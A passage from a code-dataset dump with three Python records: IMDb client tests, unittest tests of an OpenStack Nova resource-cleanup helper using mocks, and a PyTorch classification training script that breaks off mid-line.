episodes[0]\n assert episode_1.imdb_id == \"tt0579539\"\n assert episode_1.type == \"tv_episode\"\n assert episode_1.title == u'The Train Job'\n assert episode_1.series_name == 'Firefly'\n assert episode_1.release_date == \"2002-09-20\"\n assert episode_1.year == 2002\n\n def test_get_episodes_raises_when_exclude_episodes_enabled(self):\n imdb = Imdb(locale='en_US', cache=False, exclude_episodes=True)\n with pytest.raises(ValueError):\n imdb.get_episodes('tt0303461')\n\n def test_get_person_images(self):\n person_images = self.imdb.get_person_images('nm0000032')\n\n assert len(person_images) >= 200\n for person_image in person_images[:10]:\n assert person_image.caption is not None\n assert is_valid_url(person_image.url) is True\n assert isinstance(person_image.width, int)\n assert isinstance(person_image.height, int)\n\n def test_get_title_images(self):\n title_images = self.imdb.get_title_images('tt0111161')\n\n assert len(title_images) >= 38\n\n for image in title_images:\n assert isinstance(image, Image) is True\n\n def test_get_title_by_id_raises_not_found(self):\n\n with pytest.raises(HTTPError):\n self.imdb.get_title_by_id('tt9999999')\n\n @pytest.mark.parametrize('imdb_id, exp_valid', [\n ('tt1234567', True),\n ('nm1234567', True),\n ('x', False),\n (1234567, False),\n (None, False),\n ])\n def test_validate_imdb_id(self, imdb_id, exp_valid):\n\n if exp_valid:\n # no raise\n self.imdb.validate_imdb_id(imdb_id)\n else:\n with pytest.raises(ValueError):\n self.imdb.validate_imdb_id(imdb_id)\n","sub_path":"src/tests/test_imdb.py","file_name":"test_imdb.py","file_ext":"py","file_size_in_byte":13984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583479278","text":"#!/usr/bin/env python\n# -- encoding: utf-8 --\n#\n# Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U\n#\n# This file is part of FI-Core project.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n#\n# You may obtain a copy of the License at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n#\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# For those usages not covered by the Apache version 2.0 License please\n# contact with opensource@tid.es\n#\nimport unittest\nfrom mock import MagicMock\n\nfrom fiwareskuld.nova_resources import NovaResources\n\n__author__ = 'chema'\n\n\nclass TestNovaResourcesContructor(unittest.TestCase):\n \"\"\"class for testing the constructor of NovaResources\"\"\"\n def test_constructor(self):\n \"\"\"test constructor and self attributes after the call\"\"\"\n config = {'get_novaclient.return_value': 'fake_nova_client',\n 'get_session.return_value.get_project_id.return_value': 'id'}\n osclients = MagicMock(**config)\n nova_resources = NovaResources(osclients)\n self.assertEquals(nova_resources.osclients, osclients)\n self.assertEquals(nova_resources.novaclient, 'fake_nova_client')\n self.assertEquals(nova_resources.tenant_id, 'id')\n\n\nclass TestNovaResources(unittest.TestCase):\n \"\"\"class for testing the methods of NovaResources\"\"\"\n def setUp(self):\n \"\"\"create and object and fill the fields with mocks\"\"\"\n osclients = MagicMock()\n self.nova_resources = NovaResources(osclients)\n self.nova_resources.novaclient = MagicMock(name='novaclient')\n self.nova_resources.tenant_id = 'tenant_id'\n\n def test_on_region_changed(self):\n \"\"\"test method on_region_changed. Check that a new client is got\"\"\"\n old_client = self.nova_resources.novaclient\n self.nova_resources.on_region_changed()\n # check than nova client object has changed\n new_client = self.nova_resources.novaclient\n self.assertNotEquals(old_client, new_client)\n\n def prepare_vms(self, mock):\n \"\"\"prepare mock to do operations with VMS\n There are 4 VMs, all but the one are in ACTIVE state\"\"\"\n vms = list()\n for i in range(3):\n vms.append(MagicMock(id=i, user_id='userid', status='ACTIVE',\n tenant_id=self.nova_resources.tenant_id))\n vms.append(MagicMock(id=3, user_id='userid', status='OTHER',\n tenant_id=self.nova_resources.tenant_id))\n config = {'servers.list.return_value': vms}\n mock.configure_mock(**config)\n return vms\n\n def test_get_tenant_vms(self):\n \"\"\"test get_tenant_vms method. Check id, user_id and status of each\n VM\"\"\"\n self.prepare_vms(self.nova_resources.novaclient)\n result = self.nova_resources.get_tenant_vms()\n for i in range(3):\n self.assertEquals(result[i][0], i)\n self.assertEquals(result[i][1], 'userid')\n self.assertEquals(result[i][2], 'ACTIVE')\n self.assertEquals(result[3][0], 3)\n self.assertEquals(result[3][1], 'userid')\n self.assertEquals(result[3][2], 'OTHER')\n\n def test_stop_tenant_vms(self):\n \"\"\"test stop_tenant_vms. If checks that the stop method of the mock\n is called for all the VMs in ACTIVE state\"\"\"\n vms = self.prepare_vms(self.nova_resources.novaclient)\n count = self.nova_resources.stop_tenant_vms()\n self.assertEquals(count, 3)\n for i in range(3):\n self.assertTrue(vms[i].stop.called)\n self.assertFalse(vms[3].stop.called)\n\n def test_delete_tenant_vms(self):\n \"\"\"Check that the delete method of each VM is invoked\"\"\"\n config = {'servers.list.return_value': []}\n self.nova_resources.novaclient.configure_mock(**config)\n self.nova_resources.delete_tenant_vms()\n\n def prepare_keypairs(self, mock):\n \"\"\"create mock to check operatios with keypairs\"\"\"\n keypairs = list()\n for i in range(3):\n keypairs.append(MagicMock(id=i))\n config = {'keypairs.list.return_value': keypairs}\n mock.configure_mock(**config)\n return keypairs\n\n def test_get_user_keypairs(self):\n \"\"\"check that keypair list is obtained\"\"\"\n self.prepare_keypairs(self.nova_resources.novaclient)\n result = self.nova_resources.get_user_keypairs()\n for i in range(3):\n self.assertEquals(result[i], i)\n\n def test_delete_user_keypairs(self):\n \"\"\"check that delete method is called for each keypair\"\"\"\n keypairs = self.prepare_keypairs(self.nova_resources.novaclient)\n self.nova_resources.delete_user_keypairs()\n for i in range(3):\n keypairs[i].delete.assert_called_once_with()\n\n def prepare_groups(self):\n \"\"\"create 6 security groups to do tests. The first 4 groups have\n tenant_id == self.nova_resources.tenant_id. The 5th group also has\n that tenant_id, but has name == 'default'. Finally, the 6th group has\n a different tenant_id. This is because the default security group\n and the security group owned by other tenants should be ignored\"\"\"\n\n secgroups = list()\n for i in range(5):\n secgroup = MagicMock(tenant_id=self.nova_resources.tenant_id, id=i)\n secgroups.append(secgroup)\n secgroups[4].name = 'default'\n secgroups.append(MagicMock(tenant_id='other', id=5))\n return secgroups\n\n def test_get_tenant_security_groups(self):\n \"\"\"check the code that get the security groups: check that filter\n the default group and the security groups of other tenants\"\"\"\n secgroups = self.prepare_groups()\n config = {'security_groups.list.return_value': secgroups}\n self.nova_resources.novaclient.configure_mock(**config)\n security_groups = self.nova_resources.get_tenant_security_groups()\n self.assertTrue(len(security_groups) == 4)\n for security_id in security_groups:\n self.assertTrue(security_id < 4)\n\n def test_delete_tenant_security_groups(self):\n \"\"\"check that delete call is invoked in security groups with\n the same tenant_id than the object and that default is not deleted\"\"\"\n secgroups = self.prepare_groups()\n config = {'security_groups.findall.return_value': secgroups}\n self.nova_resources.novaclient.configure_mock(**config)\n self.nova_resources.delete_tenant_security_groups()\n for i in range(4):\n self.assertTrue(secgroups[i].delete.called)\n for i in range(4, 6):\n self.assertFalse(secgroups[i].delete.called)\n","sub_path":"tests/units/test_novaresources.py","file_name":"test_novaresources.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"584118712","text":"import argparse\nimport math\nimport logging\nimport time\nimport collections\nimport os.path\nimport pickle\nimport copy\nimport torch.utils.data as data\nimport torch.nn as nn\nimport torch.nn.utils.clip_grad\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch\nimport torch.optim.lr_scheduler\nimport numpy as np\nimport functools\nfrom contextlib import suppress\nfrom torch.autograd import Variable\n\n\n\nfrom .datatools import set_simp \nfrom .datatools import set_polarity\nfrom .datatools import set_cifar_challenge\nfrom .datatools import sequence_classification\nfrom .datatools import basic_classification\nfrom .datatools import img_tools\nfrom .datatools.basic_classification import DataType\nfrom .datatools import word_vectors\nfrom .modules import maxpool_lstm\nfrom .modules import squeezenet\nfrom .modules import kim_cnn\nfrom .modules import coupled_ensemble\nfrom .modules import countmult\nfrom .monitoring import reporting\nfrom .monitoring import tb_log\nfrom .genutil import modules as genutil_modules\nfrom .genutil import optimutil\nfrom .modules import reset_masks\nfrom . import __main__ as mainfuncs\nfrom .modules import saveable_data_par \nfrom .genutil import modules\nfrom torchvision import transforms\nimport torchvision.datasets as tvds\nimport candle.prune\nimport candle.proxy\ndef add_args(parser):\n if parser is None:\n parser= argparse.ArgumentParser() \n parser.add_argument(\"--dataset_for_classification\",type=str,choices=[\"simple\",\"moviepol\", \"mnist\", \"cifar_challenge\", \"cifar10\", \"minicifar10\"],default=\"simple\")\n\n parser.add_argument(\"--ds_path\", type=str,default=None)\n parser.add_argument(\"--fasttext_path\", type=str,default=\"../data/fastText_word_vectors/\" )\n parser.add_argument(\"--data_trim\", type=int, default=30000)\n parser.add_argument(\"--lstm_hidden_dim\", type = int, default =300)\n parser.add_argument(\"--maxlstm_dropout_rate\", type = int, default = 0.5)\n parser.add_argument(\"--reports_per_epoch\", type=int,default=10)\n parser.add_argument(\"--save_prefix\", type=str,default=None)\n parser.add_argument(\"--model_type\", type=str, choices=[\"maxpool_lstm_fc\", \"kimcnn\", \"squeezenet\", \"shufflenet\"],default=\"maxpool_lstm_fc\")\n parser.add_argument(\"--cifar_random_erase\", action=\"store_true\")\n parser.add_argument(\"--classification_loss_type\",type=str, choices=[\"cross_entropy\", \"nll\", \"square_hinge\"], default=\"cross_entropy\")\n parser.add_argument(\"--coupled_ensemble\",type=str, choices=[\"on\", \"off\"], default=\"off\")\n parser.add_argument(\"--coupled_ensemble_size\", type=int, default=4)\n \n \n\n parser.add_argument(\"--cifar_shuffle_val_set\",action=\"store_true\")\n \n parser.add_argument(\"--use_custom_test_data_file\",action=\"store_true\")\n parser.add_argument(\"--custom_test_data_file\")\n parser.add_argument(\"--num_custom_test_file_points\", type=int, default=1000)\n\n parser.add_argument(\"--multi_score_model\",action=\"store_true\") #for use with models that, like branchynet, prduce multiple score outputs at train time\n parser.add_argument(\"--multi_score_unit_weighting\",action=\"store_true\")#losses all get same weight\n parser.add_argument(\"--multi_score_loss_weighting\",nargs=\"+\" ) #weight for the losses derived from each of the scores \n\n parser.add_argument(\"--use_val_as_test\",action=\"store_true\")\n\n kim_cnn.add_args(parser)\n squeezenet.add_args(parser)\n \n return parser\n\n\nclass Context:\n def __init__(self, model, train_loader, val_loader, optimizer,indexer, category_names, tb_writer, train_size, data_type, scheduler, test_loader,cuda, holdout_loader, num_categories, model_parameters):\n self.model=model\n self.train_loader=train_loader\n self.val_loader=val_loader\n self.holdout_loader= holdout_loader\n self.optimizer=optimizer\n self.categpry_names=category_names\n self.tb_writer=tb_writer\n self.train_size=train_size\n self.data_type=data_type\n self.scheduler=scheduler\n self.test_loader=test_loader\n self.cuda=cuda\n self.num_categories=num_categories\n self.model_parameters = model_parameters\n\n \n self.stashfile=None\n\n def stash_model(self):\n self.stashfile = \"../temp/temp_storage_\"+str(id(self))\n torch.save(self.model, self.stashfile)\n self.model=None\n def unstash_model(self):\n self.model=torch.load(self.stashfile)\n if self.cuda:\n self.model=self.model.cuda()\n self.stashfile=None\n\n\ndef make_context(args):\n holdout_loader =None\n if args.enable_l0reg or args.proxy_context_type == \"l0reg_context\" :\n assert args.enable_l0reg and args.proxy_context_type == \"l0reg_context\" \n if args.enable_l1reg or args.proxy_context_type == \"l1reg_context_slimming\":\n assert args.enable_l1reg and args.proxy_context_type == \"l1reg_context_slimming\"\n assert args.save_prefix is not None \n if args.dataset_for_classification == \"simple\":\n if args.save_prefix is None:\n args.save_prefix=\"simplification_classification\"\n if args.ds_path is None:\n args.ds_path= \"../data/sentence-aligned.v2\" \n train_dataset, val_dataset, index2vec, indexer = set_simp.load(args)\n category_names={0:\"normal\",1:\"simple\"}\n data_type=DataType.SEQUENCE\n elif args.dataset_for_classification == \"moviepol\":\n if args.save_prefix is None:\n args.save_prefix= \"moviepol\"\n if args.ds_path is None:\n args.dspath = \"../data/rt-polaritydata\"\n train_dataset, val_dataset, index2vec, indexer = set_polarity.load(args)\n category_names={0:\"negative\",1:\"positive\"}\n data_type=DataType.SEQUENCE\n elif args.dataset_for_classification == \"mnist\":\n num_categories =10\n train_dataset = tvds.MNIST('../data/mnist', train=True, download=True, transform=transforms.Compose([transforms.ToTensor(),transforms.Normalize((0,), (1,))]))\n val_dataset = tvds.MNIST('../data/mnist', train=False, download=True, transform=transforms.Compose([transforms.ToTensor(),transforms.Normalize((0,), (1,))]))\n category_names={0:\"1\",1:\"2\", 3: \"3\", 4: \"4\", 5: \"5\", 6: \"6\", 7: \"7\", 8: \"8\", 9: \"9\"}\n data_type = DataType.IMAGE \n test_dataset=val_dataset #for testing\n elif args.dataset_for_classification == \"cifar_challenge\":\n num_categories = 100\n data_type = DataType.IMAGE\n f=open(\"./local_data/cifar/train_data\",\"rb\")\n squashed_images=pickle.load(f)\n labels=pickle.load(f)\n f.close()\n train_dataset,val_dataset = set_cifar_challenge.make_train_val_datasets(squashed_images, labels, args.validation_set_size, transform=None, shuf=args.cifar_shuffle_val_set) \n tr = transforms.Compose([transforms.RandomCrop(size=32 ,padding= 4), transforms.RandomHorizontalFlip(), transforms.ToTensor() ])\n if args.cifar_random_erase:\n tr=transforms.Compose([tr, img_tools.RandomErase()])\n if args.holdout:\n holdout_dataset, val_dataset = val_dataset.split(args.holdout_size)\n train_dataset.transform = tr\n val_dataset.transform = transforms.ToTensor()\n \n if args.mode == \"train\":\n pass\n test_dataset=None\n elif args.mode == \"test\":\n if args.use_custom_test_data_file:\n f=open(args.custom_test_data_file,\"rb\")\n else:\n f=open(\"./local_data/cifar/test_data\",\"rb\")\n squashed_images=pickle.load(f)[:args.num_custom_test_file_points]\n test_dataset= set_cifar_challenge.Dataset(data=squashed_images, labels=[-1]*squashed_images.shape[0], transform=transforms.ToTensor())\n f.close()\n\n\n category_names= { k:v for k,v in enumerate(set_cifar_challenge.CIFAR100_LABELS_LIST)}\n elif args.dataset_for_classification == \"cifar10\":\n num_categories = 10\n data_type = DataType.IMAGE\n tr = transforms.Compose([transforms.RandomCrop(size=32 ,padding= 4), transforms.RandomHorizontalFlip(), transforms.ToTensor() ])\n if args.cifar_random_erase:\n tr=transforms.Compose([tr, img_tools.RandomErase()])\n\n f=open('./local_data/cifar10/cifar-10-batches-py/data_batch_1','rb')\n dictionary=pickle.load(f,encoding=\"bytes\")\n squashed_images = dictionary[b'data']\n labels = dictionary[b'labels']\n f.close()\n for i in range(2,6):\n f=open('local_data/cifar10/cifar-10-batches-py/data_batch_'+str(i),'rb')\n dictionary = pickle.load(f, encoding='bytes')\n squashed_images = np.concatenate((squashed_images, dictionary[b'data']),axis=0)\n labels.extend(dictionary[b'labels'])\n f.close()\n\n train_dataset, val_dataset = set_cifar_challenge.make_train_val_datasets(squashed_images, labels, args.validation_set_size, transform=None, shuf=args.cifar_shuffle_val_set) \n train_dataset.transform = tr\n val_dataset.transform = transforms.ToTensor()\n f=open('./local_data/cifar10/cifar-10-batches-py/test_batch','rb')\n dictionary=pickle.load(f,encoding=\"bytes\")\n squashed_images = dictionary[b'data']\n labels = dictionary[b'labels']\n f.close()\n test_dataset= set_cifar_challenge.Dataset(data=squashed_images, labels=labels, transform=transforms.ToTensor())\n if args.use_val_as_test:\n test_dataset=val_dataset\n\n \n #train_dataset = tvds.CIFAR10(\"./local_data/cifar10/\", train=True, download= True, transform=tr ) \n #val_dataset = tvds.CIFAR10(\"./local_data/cifar10/\", train=False, download= True, transform=transforms.ToTensor() ) \n category_names = {0:\"airplane\", 1:\"automobile\", 2:\"bird\", 3:\"cat\", 4:\"deer\", 5:\"dog\", 6:\"frog\", 7:\"horse\", 8: \"ship\", 9: \"truck\" }\n if args.use_custom_test_data_file:\n f=open(args.custom_test_data_file,\"rb\")\n dictionary = pickle.load(f,encoding='bytes')\n squashed_images=dictionary[b'data'][:args.num_custom_test_file_points]\n test_dataset= set_cifar_challenge.Dataset(data=squashed_images, labels=dictionary[b'labels'][:args.num_custom_test_file_points], transform=transforms.ToTensor())\n f.close()\n elif args.dataset_for_classification == \"minicifar10\":\n minicifar_size=200+args.validation_set_size \n num_categories = 10\n data_type = DataType.IMAGE\n tr = transforms.Compose([transforms.RandomCrop(size=32 ,padding= 4), transforms.RandomHorizontalFlip(), transforms.ToTensor() ])\n if args.cifar_random_erase:\n tr=transforms.Compose([tr, img_tools.RandomErase()])\n\n f=open('./local_data/cifar10/cifar-10-batches-py/data_batch_1','rb')\n dictionary=pickle.load(f,encoding=\"bytes\")\n squashed_images = dictionary[b'data']\n labels = dictionary[b'labels']\n f.close()\n for i in range(2,6):\n f=open('local_data/cifar10/cifar-10-batches-py/data_batch_'+str(i),'rb')\n dictionary = pickle.load(f, encoding='bytes')\n squashed_images = np.concatenate((squashed_images, dictionary[b'data']),axis=0)\n labels.extend(dictionary[b'labels'])\n f.close()\n #remove most images to make minicifar\n squashed_images=squashed_images[:minicifar_size,:]\n labels=labels[:minicifar_size]\n logging.info(\"Counts of labels in minicifar:{}\".format(collections.Counter(labels[args.validation_set_size:minicifar_size])))\n train_dataset, val_dataset = set_cifar_challenge.make_train_val_datasets(squashed_images, labels, args.validation_set_size, transform=None, shuf=args.cifar_shuffle_val_set) \n train_dataset.transform = tr\n val_dataset.transform = transforms.ToTensor()\n\n f=open('./local_data/cifar10/cifar-10-batches-py/test_batch','rb')\n dictionary=pickle.load(f,encoding=\"bytes\")\n squashed_images = dictionary[b'data']\n labels = dictionary[b'labels']\n f.close()\n test_dataset= set_cifar_challenge.Dataset(data=squashed_images, labels=labels, transform=transforms.ToTensor())\n if args.use_val_as_test:\n test_dataset=val_dataset\n\n \n #train_dataset = tvds.CIFAR10(\"./local_data/cifar10/\", train=True, download= True, transform=tr ) \n #val_dataset = tvds.CIFAR10(\"./local_data/cifar10/\", train=False, download= True, transform=transforms.ToTensor() ) \n category_names = {0:\"airplane\", 1:\"automobile\", 2:\"bird\", 3:\"cat\", 4:\"deer\", 5:\"dog\", 6:\"frog\", 7:\"horse\", 8: \"ship\", 9: \"truck\" }\n\n\n\n\n\n else:\n raise Exception(\"Unknown dataset.\")\n \n\n\n logging.info(\"using save prefix \"+str(args.save_prefix))\n\n\n if data_type == DataType.SEQUENCE:\n embedding=word_vectors.embedding(index2vec, indexer.n_words,300)\n train_loader= data.DataLoader(train_dataset,batch_size = args.batch_size,shuffle = True,collate_fn = sequence_classification.make_collater(args))\n val_loader= data.DataLoader(val_dataset,batch_size = args.batch_size, shuffle = False, collate_fn = sequence_classification.make_collater(args))\n elif data_type == DataType.IMAGE:\n indexer= None\n if args.mode == \"train\": #can probably remove this if block. Now we have all loaders availible in all modes\n train_loader=data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle= True, collate_fn=basic_classification.make_var_wrap_collater(args), drop_last= args.drop_last_training_batch)\n val_loader=data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle= False, collate_fn=basic_classification.make_var_wrap_collater(args,volatile=True ))\n test_loader = data.DataLoader(test_dataset, batch_size=args.batch_size, shuffle= False, collate_fn=basic_classification.make_var_wrap_collater(args, volatile=True)) if test_dataset is not None else None\n elif args.mode == \"test\":\n train_loader=data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle= True, collate_fn=basic_classification.make_var_wrap_collater(args))\n test_loader = data.DataLoader(test_dataset, batch_size=args.batch_size, shuffle= False, collate_fn=basic_classification.make_var_wrap_collater(args, volatile=True))\n val_loader = data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle= False, collate_fn=basic_classification.make_var_wrap_collater(args)) #certain ensemble methods use the val dataset \n assert(args.resume_mode == \"standard\" or args.resume_mode == \"ensemble\")\n # if args.holdout:\n # holdout_loader=data.DataLoader(holdout_dataset, batch_size=args.batch_size, shuffle= False, collate_fn=basic_classification.make_var_wrap_collater(args,volatile=True))\n else:\n raise Exception(\"Unknown data type.\")\n \n \n if args.model_type == \"maxpool_lstm_fc\":\n model=maxpool_lstm.MaxPoolLSTMFC.from_args(embedding, args) \n elif args.model_type == \"kimcnn\":\n model=kim_cnn.KimCNN.from_args(embedding,args) \n elif args.model_type == \"squeezenet\":\n model=squeezenet.SqueezeNet.from_args(args)\n if args.l0reg_lambda_vary_by_layer:\n model.set_lambd_by_subblock(lambd_first=args.l0reg_lambda_vary_first, lambd_last=args.l0reg_lambda_vary_last)\n if args.l0reg_lambda_vary_by_sublayer_name:\n name_dict={}\n name_dict[\"squeeze_conv\"]=args.l0reg_lambda_squeeze_conv\n name_dict[\"group_conv\"]= args.l0reg_lambda_group_conv\n name_dict[\"expand_conv\"]=args.l0reg_lambda_expand_conv\n model.set_l0_lambda_by_name(name_dict)\n\n else:\n raise Exception(\"Unknown model\")\n\n\n if args.cuda and not args.data_par_enable:\n model=model.cuda()\n if args.coupled_ensemble ==\"on\":\n assert args.classification_loss_type == \"nll\"\n model_list = []\n for i in range(args.coupled_ensemble_size):\n cur_model=copy.deepcopy(model)\n cur_model.init_params()\n model_list.append(cur_model)\n model = coupled_ensemble.CoupledEnsemble(model_list)\n elif args.coupled_ensemble != \"off\":\n raise Exception(\"Unknown coupled ensemble settting\")\n\n if args.proxy_context_type == \"no_context\":\n model_parameters = model.parameters()\n else:\n if args.enable_l0reg:\n assert args.use_all_params\n elif args.enable_l1reg:\n assert not args.use_all_params #in the network slimming case, we do not optimize over the masks. They are set to zero based on a pruning scheule\n if args.use_all_params:\n model_parameters = model.proxy_ctx.list_params()\n else: \n model_parameters = model.proxy_ctx.list_model_params()\n \n\n if args.optimizer == \"sgd\":\n optimizer=optim.SGD(model_parameters,lr=args.init_lr, momentum=args.sgd_momentum, weight_decay=args.sgd_weight_decay )\n \n elif args.optimizer == \"rmsprop\":\n optimizer = optim.RMSprop(model_parameters, lr=args.init_lr)\n elif args.optimizer == \"adam\":\n optimizer = optim.Adam(model_parameters, lr=args.init_lr)\n else:\n raise Exception(\"Unknown optimizer.\") \n\n if args.lr_scheduler == \"exponential\":\n scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer,args.lr_gamma)\n elif args.lr_scheduler == \"plateau\":\n scheduler= torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode=\"max\", verbose=True, patience=args.plateau_lr_scheduler_patience)\n elif args.lr_scheduler == \"linear\":\n lam = lambda epoch: 1-args.linear_scheduler_subtract_factor* min(epoch,args.linear_scheduler_max_epoch)/args.linear_scheduler_max_epoch \n scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lam )\n elif args.lr_scheduler == \"multistep\":\n milestones=[args.multistep_scheduler_milestone1, args.multistep_scheduler_milestone2]\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=milestones, gamma=args.lr_gamma )\n elif args.lr_scheduler == \"epoch_anneal\":\n if args.epoch_anneal_init_period>0:\n Tmax = args.epoch_anneal_init_period\n else:\n Tmax=args.num_epochs//args.epoch_anneal_numcycles\n scheduler= optimutil.MyAnneal(optimizer=optimizer, Tmax=Tmax, init_lr=args.init_lr)\n elif args.lr_scheduler is None or args.lr_scheduler == \"none\":\n scheduler = None\n else: \n raise Exception(\"Unknown Scheduler\")\n\n\n if args.mode ==\"train\":\n pass\n train_size=len(train_dataset)\n # test_loader = None\n elif args.mode==\"test\":\n pass\n train_size= None\n # train_loader = None\n\n return Context(model, train_loader, val_loader, optimizer, indexer, category_names=category_names, tb_writer=tb_log.TBWriter(\"{}_\"+args.save_prefix), train_size=train_size, data_type=data_type, scheduler=scheduler, test_loader=test_loader, cuda=args.cuda, holdout_loader= holdout_loader, num_categories = num_categories, model_parameters=model_parameters)\n\n\n\n\n\n\ndef run(args, ensemble_test=False):\n if ensemble_test:\n assert type(args) is list\n contexts=[] #[make_context(arg_instance) for arg_instance in args ]\n for arg_instance in args:\n contexts.append(make_context(arg_instance))\n contexts[-1].stash_model()\n for context, arg_instance in zip(contexts,args):\n logging.info(\"loading saved model from file: \"+arg_instance.res_file)\n context.unstash_model()\n context.model.load(os.path.join(arg_instance.model_save_path, arg_instance.res_file))\n context.stash_model()\n if args[0].weight_ensemble_on_validation_set:\n meta_model = basic_classification.optimize_ensemble_on_val(contexts, contexts[0].val_loader)\n else:\n meta_model = None\n basic_classification.make_ensemble_prediction_report(contexts, contexts[0].test_loader, args[0].test_report_filename, meta_model=meta_model)\n return\n\n context=make_context(args) \n if args.resume_mode == \"standard\":\n logging.info(\"loading saved model from file: \"+args.res_file)\n context.model.load(os.path.join(args.model_save_path, args.res_file), strict= not args.load_nonstrict)\n if args.adjust_out_dim_after_loading:\n context.model.adjust_out_dim(args.new_out_dim, linear=args.new_final_linear,spatial_dim=args.squeezenet_final_side_length )\n if args.born_again_enable:\n if args.born_again_args_file is not None:\n logging.info(\"loading born again args from \"+args.born_again_args_file)\n previous_incarnation_context=make_context( mainfuncs.get_args_from_files([args.born_again_args_file]) [0])\n else:\n previous_incarnation_context=make_context(args)\n logging.info(\"loading previous incarnation from file: \"+str(args.born_again_model_file))\n previous_incarnation_context.model.load(os.path.join(args.born_again_model_file))\n for param in previous_incarnation_context.model.parameters():\n param.requires_grad = False\n if args.print_model:\n logging.info(repr(context.model))\n return\n\n if args.reset_masks_after_loading:\n reset_masks.reset_masks(context.model)\n \n\n if args.plot_unpruned_masks:\n import matplotlib.pyplot as plt\n import numpy as np\n plot_dict = context.model.prop_nonzero_masks() \n fig, ax = plt.subplots()\n for label, props in plot_dict.items():\n layer_nums = np.arange(0,len(props))\n np_props = np.asarray(props)\n ax.plot(layer_nums, np_props, label=label)\n legend = ax.legend(loc='upper left')\n ax.set(xlabel=\"residual unit #\", ylabel = \"proportion of masks unpruned\", title=args.plot_title)\n plt.show()\n return\n\n if args.plot_flop_reduction_by_layer:\n import matplotlib.pyplot as plt\n import numpy as np\n img_h, img_w, channels = get_dims_from_dataset(args.dataset_for_classification) \n props, _ = context.model.prop_flop_reduction(img_h = img_h, img_w= img_w, input_channels = channels) \n fig, ax = plt.subplots()\n layer_nums = np.arange(0,len(props))\n np_props = np.asarray(props)\n ax.plot(layer_nums, np_props)\n ax.set(xlabel=\"residual unit #\", ylabel = \"pruned flops / unpruned flops\", title=args.plot_title)\n plt.show()\n return\n\n if args.plot_absolute_flop_reduction_by_layer:\n import matplotlib.pyplot as plt\n import numpy as np\n img_h, img_w, channels = get_dims_from_dataset(args.dataset_for_classification) \n _, difs = context.model.prop_flop_reduction(img_h = img_h, img_w= img_w, input_channels = channels) \n fig, ax = plt.subplots()\n layer_nums = np.arange(0,len(difs))\n np_difs = np.asarray(difs)\n ax.plot(layer_nums, np_difs)\n ax.set(xlabel=\"residual unit #\", ylabel = \"unpruned flops - pruned_flops\", title=args.plot_title)\n plt.show()\n return\n\n\n\n\n if args.mode == \"test\":\n basic_classification.make_prediction_report(context, context.test_loader,args.test_report_filename, no_grad=args.use_nograd) \n if args.dataset_for_classification == \"cifar_challenge\" or args.dataset_for_classification == \"cifar10\":\n img_h=32\n img_w=32\n channels=3\n logging.info(\"multiplies performed by tested model \"+ str(countmult.count_approx_multiplies(context.model, img_h=img_h, img_w=img_w, input_channels=channels))) \n\n return\n \n if args.lr_scheduler == \"epoch_anneal\":\n epoch_anneal_cur_cycle=0\n \n \n context.tb_writer.write_hyperparams()\n timestamp=reporting.timestamp()\n \n report_interval=max(len(context.train_loader) // args.reports_per_epoch ,1)\n accumulated_loss=0 \n if args.enable_l1reg:\n accumulated_l1l=0\n if args.enable_l2reg_stochastic:\n accumulated_l2l_stochastic=0\n\n param_count=genutil_modules.count_trainable_params(context.model)\n if args.proxy_context_type == \"no_context\": \n param_count = modules.count_trainable_params(context.model)\n else:\n param_count = modules.count_elem(context.model.proxy_ctx.list_model_params() ) \n\n logging.info(\"Number of parameters: \"+ str(param_count))\n context.tb_writer.write_num_trainable_params(param_count)\n\n\n if args.factorize_trained:\n context.model.eval()\n if args.dataset_for_classification == \"cifar_challenge\" or args.dataset_for_classification == \"cifar10\":\n img_h=32\n img_w=32\n channels=3\n logging.info(\"multiplies before factorization: \"+ str(countmult.count_approx_multiplies(context.model, img_h=img_h, img_w=img_w, input_channels=channels))) \n \n if args.factorize_trained_method == \"svd\":\n with torch.no_grad():\n logging.info(\"svd factorizing model\")\n context.model.proxy_ctx.save_samples_all()\n for i,(batch_in, *other) in enumerate(context.train_loader): \n if i>=20:\n break\n context.model(batch_in)\n context.model.proxy_ctx.factorize_all(strategy=\"svd\",rank_prop=args.factorize_svd_rank_prop) \n context.model.proxy_ctx.clear_samples_all()\n logging.info(\"multiplies after factorization: \"+ str(countmult.count_approx_multiplies(context.model, img_h=img_h, img_w=img_w, input_channels=channels))) \n context.model.save(os.path.join( args.model_save_path, args.res_file+\"_svd_factorize_\" + str(args.factorize_svd_rank_prop) ) )\n else:\n raise Exception(\"Unknown factorization method\")\n return\n\n if args.count_multiplies:\n context.model.eval() #for sampling to compute avg mults in forking models\n if args.get_forking_props_on_val:\n squeezenet.forking_props_from_sample(context.model,context.val_loader )\n if args.count_mult_override_img_dims:\n img_h = args.count_mult_override_imgh\n img_w = args.count_mult_override_imgw\n channels=3\n elif args.dataset_for_classification == \"cifar_challenge\" or args.dataset_for_classification ==\"cifar10\":\n img_h=32\n img_w=32\n channels=3\n cm = countmult.count_approx_multiplies(context.model, img_h=img_h, img_w=img_w, input_channels=channels)\n if args.short_test_report:\n print(cm)\n else:\n print(\"Approx number of multiplies: \",cm ) \n return\n\n\n if args.set_prune_deemph:\n context.model.deemph_string(args.prune_deemph_string)\n\n if args.enable_pruning:\n init_mask_count = context.model.proxy_ctx.count_unpruned_masks()\n logging.info(\"Initial number of masks {}\".format(init_mask_count))\n if 